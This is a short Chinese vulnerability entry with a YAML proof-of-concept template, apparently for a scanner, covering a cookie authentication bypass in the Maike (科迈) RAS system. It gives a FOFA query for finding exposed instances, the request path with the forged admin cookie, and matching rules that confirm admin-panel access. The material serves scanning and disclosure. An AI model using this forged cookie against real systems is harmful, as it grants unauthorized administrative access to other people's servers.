漏洞描述
科迈 RAS系统 存在Cookie验证越权,当 RAS_Admin_UserInfo_UserName 设置为 admin 时可访问后台
fofa: app="科迈-RAS系统"
maike-ras-cookie-bypass: 科迈 RAS系统 Cookie验证越权漏洞
PoC代码[已公开]
id: maike-ras-cookie-bypass
info:
name: 科迈 RAS系统 Cookie验证越权漏洞
author: zan8in
severity: high
description: |-
科迈 RAS系统 存在Cookie验证越权,当 RAS_Admin_UserInfo_UserName 设置为 admin 时可访问后台
fofa: app="科迈-RAS系统"
tags: maike,ras,cookie-bypass
created: 2025/03/27
rules:
r0:
request:
method: GET
path: /Server/CmxUser.php?pgid=UserList
headers:
Cookie: RAS_Admin_UserInfo_UserName=admin
expression: response.status == 200 && response.body.bcontains(b'退出</A>') && response.body.bcontains(b'系统登录</A>') && response.body.bcontains(b'配置管理</A>')
expression: r0()